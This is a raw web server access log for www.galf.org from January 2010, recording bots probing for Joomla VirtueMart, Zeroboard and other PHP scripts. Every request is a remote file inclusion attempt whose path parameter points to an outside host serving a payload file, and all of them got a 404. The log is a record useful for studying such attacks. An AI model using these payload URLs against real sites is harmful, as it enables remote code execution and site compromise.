210.205.6.233 - - [25/Jan/2010:00:00:12 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:00:22 -0800] "GET /logs/access_091019.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:00:33 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:00:46 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:00:46 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:25 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:28 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:29 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:01:29 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:31 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:37 -0800] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:37 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:42 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:42 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:52 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:52 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:52 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [25/Jan/2010:00:01:59 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:00:02:00 -0800] "GET /logs/access.log//board//bbs//delete_all.php?board_skin_path=http://www.raygina.de/cms/son?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:00:02:00 -0800] "GET /logs//board//bbs//delete_all.php?board_skin_path=http://www.raygina.de/cms/son?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:00:02:00 -0800] "GET /board//bbs//delete_all.php?board_skin_path=http://www.raygina.de/cms/son?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:02:07 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:22 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:25 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:26 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:26 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:02:28 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:02:39 -0800] "GET /logs/access_091019.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:42 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:43 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:43 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:43 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:02:48 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:02:52 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:02:55 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:02:55 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:02:56 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:03:00 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:03:01 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:03:13 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:03:13 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:03:13 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:03:19 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:03:19 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:03:19 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:03:21 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:03:21 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:03:21 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [25/Jan/2010:00:04:09 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:05:48 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:05:52 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:00:07:13 -0800] "GET /board//bbs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:00:07:13 -0800] "GET /logs//board//bbs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [25/Jan/2010:00:07:13 -0800] "GET /logs/access.log//board//bbs//delete_all.php?board_skin_path=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:08:57 -0800] "GET /logs/access_100118.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:09:19 -0800] "GET /logs/access_100118.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:28 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:28 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:28 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:35 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:35 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:35 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:40 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:40 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:13:40 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:00:15:34 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:15:34 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:15:34 -0800] "GET /logs/access_090727.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:15:34 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:15:34 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:15:34 -0800] "GET /logs/access_090727.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:16:37 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:16:37 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:16:37 -0800] "GET /logs/access_090727.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:19:36 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:19:36 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:19:36 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:00:19:50 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:00:19:50 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:00:19:50 -0800] "GET /logs/access_090720.log//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:20:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:20:00 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:20:00 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:20:02 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:20:02 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:20:02 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:00:20:14 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.12.14 - - [25/Jan/2010:00:20:14 -0800] "GET /logs/access_090720.log//bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [25/Jan/2010:00:21:49 -0800] "GET /installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [25/Jan/2010:00:21:49 -0800] "GET /logs//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [25/Jan/2010:00:21:49 -0800] "GET /logs/access.log%20%20//installation/index.php?mosConfig_absolute_path=http://www.rajrajeswari.com/includes/domit/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [25/Jan/2010:00:24:12 -0800] "GET /logs/access.log//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:24:12 -0800] "GET /forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:24:12 -0800] "GET /logs//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:24:29 -0800] "GET /forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:24:29 -0800] "GET /logs/access.log//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:00:24:30 -0800] "GET /logs//forum_folder/jscripts/folder_rte_files/module_table.php?editorid=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:26:38 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:26:58 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:27:21 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
